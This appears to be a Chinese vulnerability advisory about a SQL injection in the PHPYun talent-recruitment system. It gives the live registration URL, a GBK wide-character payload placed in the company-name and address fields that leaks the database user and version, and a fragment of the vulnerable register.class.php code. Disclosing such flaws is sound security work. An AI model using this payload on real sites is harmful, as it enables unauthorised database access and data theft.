PHP云人才系统SQL注入

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: PHP云人才系统SQL注入,官网测试。 ### 详细说明: PHP云人才系统 企业用户注册页面 编码转换导致的SQL注入: ``` http://www.hr135.com/index.php?m=register&usertype=2 ``` ``` 公司名称:錦 公司地址:,address=注入的SQL,这里用,address=concat(user(),0x0a,version())# ``` 如下图: [<img src="https://images.seebug.org/upload/201411/0717111684118f0001a325ba5208e9e74742c6ad.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/0717111684118f0001a325ba5208e9e74742c6ad.png) 点击立即注册,注册成功后进入"企业信息页面",可以看到数据显示在"公司地址"里面, 如下图: [<img src="https://images.seebug.org/upload/201411/0717163303b83e6838b38271c6a33b54ff12ef4b.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/0717163303b83e6838b38271c6a33b54ff12ef4b.png) 对应的代码为: ``` model/register.class.php 63 function regsave_action(){ 64 $_POST=$this->post_trim($_POST); 65 $_POST['username']=iconv("utf-8","gbk",$_POST['username']); 66 $_POST['unit_name']=iconv("utf-8","gbk",$_POST['unit_name']); //...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息